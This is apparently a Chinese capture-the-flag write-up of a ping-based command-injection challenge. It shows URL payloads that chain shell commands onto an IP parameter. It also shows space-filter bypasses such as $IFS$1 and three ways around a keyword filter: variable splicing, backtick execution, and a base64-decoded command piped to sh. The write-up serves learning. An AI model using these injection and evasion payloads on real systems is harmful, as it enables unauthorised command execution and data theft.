一道经典的远程连接命令执行ping题,过滤的内容有点多,看了一眼wp没想到有三种不同的解题思路,很有意思
目录
?
?
与上题不同的是,这里没有输入框,提示我们/?ip=?,应该是在url内执行语句
有回显,尝试利用管道符|执行ls
/?ip=127.0.0.1|ls
难道。。。可以直接cat flag.php?? ?
?
/?ip=127.0.0.1|cat flag.php
被发现了,看来是我高兴太早了 
?
用屁股想了一下,这里是空格被过滤了
尝试绕过
<空格绕过>
| < |
|---|
| <> |
| %20 |
| %09 |
| $IFS$9 |
| ${IFS} |
| $IFS$1 |
一个个来试一下,使用最后一个$IFS$1的时候发现回显有变化(成功了但是没完全成功) ?
?
好家伙,flag被过滤了,只能将目标放在另一个php文件
利用刚才的$IFS$1查看一下index.php,过滤的内容有点严重,flag果然被过滤了
方法一
命令执行变量拼接
payload:
(1)/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php;
(2)/?ip=127.0.0.1;c=a;d=g;b=l;a=f;cat$IFS$1$a$b$c$d.php;
【注意,这里还是很容易被检测出flag,位置一定要打乱】 
方法二
内联绕过
将反引号内内容当做输出执行,ls列出了当前目录的所有文件之后被当作命令的一部分拼接在cat后面一起被执行
大佬payload:
?ip=127.0.0.1;cat$IFS$1`ls`
?
方法三
base64解码
这题如果我们使用cat flag.php执行的话,会被检测出空格导致报错,不妨换个思路,可以将cat flag.php进行base64编码,利用管道符连接base64 -d执行解码,即可得出flag。
注:由于-d前面有空,还需添加$IFS$1绕过
先利用base64加密;加密网址:Base64 在线编码解码 | Base64 加密解密 - Base64.us 
构造payload,得到flag
/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh